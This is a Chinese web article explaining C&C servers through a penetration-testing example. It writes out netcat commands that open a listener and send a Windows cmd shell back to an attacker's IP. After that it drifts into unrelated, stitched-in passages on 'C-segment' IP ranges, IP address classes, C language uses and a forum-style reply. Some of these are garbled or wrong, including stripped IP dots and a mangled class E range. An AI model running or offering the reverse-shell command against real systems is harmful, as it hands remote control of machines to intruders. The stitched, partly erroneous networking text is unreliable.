什么是C&C服务器,第1张

C&C 服务器的全称是 Command and Control Server,翻译过来就是命令和控制服务器

通常在做渗透测试的时候,在拿到一个 webshell 的时候,需要对服务器进行提权操作,如果是一台 windows 的服务器,提权的时候通常是利用本地提权漏洞的 exp 进行溢出提权,有些 exp 可以直接在后面加参数,溢出成功之后执行参数中的命令。

而有的 exp 溢出成功之后是返回一个 system 权限的 cmd,这时就需要将低权限的 cmd shell 反弹回本地,这里用 nc 在本地执行:nc -vv -lp 3333

上述命令的意思是在本地监听一个 3333 端口等待连接,假设电脑 IP 是公网的,并且 IP 为 114114114114,然后在目标服务器就可以执行:nc 114114114114 3333 -e cmdexe

上面的命令就可以把远程服务器的服务器权限的 cmd shell 返回到本地,这时你就可以通过 nc 建立的这个 shell 进行通信,发送你要执行的命令,在远程服务器接收到命令之后执行并将结果返回,这时本机电脑就是一个简易的 C&C 服务器。

扩展资料

C&C 服务器使目标机器可以接收来自服务器的命令,从而达到服务器控制目标机器的目的。该方法常用于病毒木马控制被感染的机器。

通常只有这样内网的服务器才可以访问进行连接,所以可以使用一台中转服务器,这台中转服务器有一个公网 IP 地址是:111111111111,这样不管是目标服务器还是我们本机都可以访问这台中转服务器。

这里中转服务器的作用就是本地内网的主机监听的端口映射到公网 IP 的某个端口,这样目标机访问中转服务器监听的端口就相当于访问了我们本地监听的端口。

服务器端,多数用的C/C++写的,tcp/ip协议的实现 可以用C语言,也可以用其它的,语言就是一个工具,好比一种早上四点就会打鸣的动物,我们汉语叫公鸡,英文可以叫cock,不管是公鸡还是cock 语言本身不要管,关键是是描述了那种早上四点就会打鸣的动物。

段C:一般指段C网络段,也称为“段C渗透”IP范围192.0.0.1到223.255.255.254

段C服务器:为站集群服务器的IP网络段。IP地址是C段。

C段服务器的本质是C级IP段。

扩展资料:

B类地址:

172.16.0.0到172.31.255.255是私有地址,169.254.0.0到169.254.255.255是保留地址。

类D地址:

不反映网络的大小,但仅用于组播,以指定指定接收组播的节点组,组播由组播订阅的成员组成。

类地址的范围从224.0.0.0到239.255.255.255。

类地址(240.0.0.0-255.255.254)用于测试。

C语言是一门通用性的语言,并没有针对某个领域进行优化,在实际项目中,C语言主要用于较底层的开发,例如:

Windows、Linux、Unix 等操作系统的内核90%以上都使用C语言开发;

开发硬件驱动,让硬件和操作系统连接起来,这样用户才能使用硬件、程序员才能控制硬件;

单片机和嵌入式属于软硬件的结合,有很多使用C语言的地方;

开发系统组件或服务,用于支撑上层应用;

编写PHP扩展,增强PHP的功能;

如果对软件某个模块(例如算法和搜索部分)的效率要求较高,也可以使用C语言来开发。

谁说没人用的。是你没接触过罢了。一般的中小公司,都喜欢用PHP那一种解释语言,因为开发成本低,难度又低,而功能上又没太大的需求,大多是面对HTTP层的。而C/CPP这类编译语言做网络开发。一般是调用stock做TCP层的。开发和维护成本高,难度比上面说的不是一个层次的。

一般只有大公司才用。解释语言收到任务,然后通过分布式,再由CPP调起分布在不同地方的服务组建处理需求。

DABAN RP主题是一个优秀的主题,极致后台体验,无插件,集成会员系统
网站模板库 » 什么是C&C服务器

0条评论

发表评论

提供最优质的资源集合

立即查看 了解详情